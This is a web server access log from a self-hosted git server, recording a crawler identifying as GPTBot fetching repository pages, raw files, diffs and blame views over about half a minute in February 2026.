"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11026] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21794] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10925] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:14:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10894] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:44:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" +[17/Feb/2026:14:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js.good" [Client 74.7.227.38] [Length 29149] [Gzip 8.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" +[17/Feb/2026:14:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fmain.py.good" [Client 74.7.227.38] [Length 28731] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:14:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/forgot_password" [Client 74.7.227.38] [Length 4114] [Gzip 2.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/user/login" +[17/Feb/2026:14:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2findex.html" [Client 74.7.227.38] [Length 24093] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" +[17/Feb/2026:14:44:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/i18n.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" +[17/Feb/2026:14:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11050] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9892] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11018] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:14:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21822] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:44:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fjs%2fi18n.js" [Client 74.7.227.38] [Length 23299] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:14:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 317776] [Gzip 14.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" +[17/Feb/2026:14:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 74.7.227.38] [Length 11801] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" +[17/Feb/2026:14:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 30219] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 30215] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 37207] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fletsencrypt%2frenewal" [Client 74.7.227.38] [Length 24908] [Gzip 5.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal" +[17/Feb/2026:14:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 22686] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages" +[17/Feb/2026:14:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" +[17/Feb/2026:14:45:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/" [Client 74.7.227.38] [Length 48] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:14:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot" [Client 74.7.227.38] [Length 14724] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/" +[17/Feb/2026:14:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f.diff" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:14:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 18602] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 288849] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" +[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20335] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:14:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20304] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 20331] [Gzip 6.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:14:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:14:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 48969] [Gzip 21.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/project.assets.json" +[17/Feb/2026:14:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 9853] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:14:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 25634] [Gzip 12.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:14:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" [Client 74.7.227.38] [Length 21975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:14:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11755] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11571] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" +[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" +[17/Feb/2026:14:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1%20copy.py" [Client 74.7.227.38] [Length 9279] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 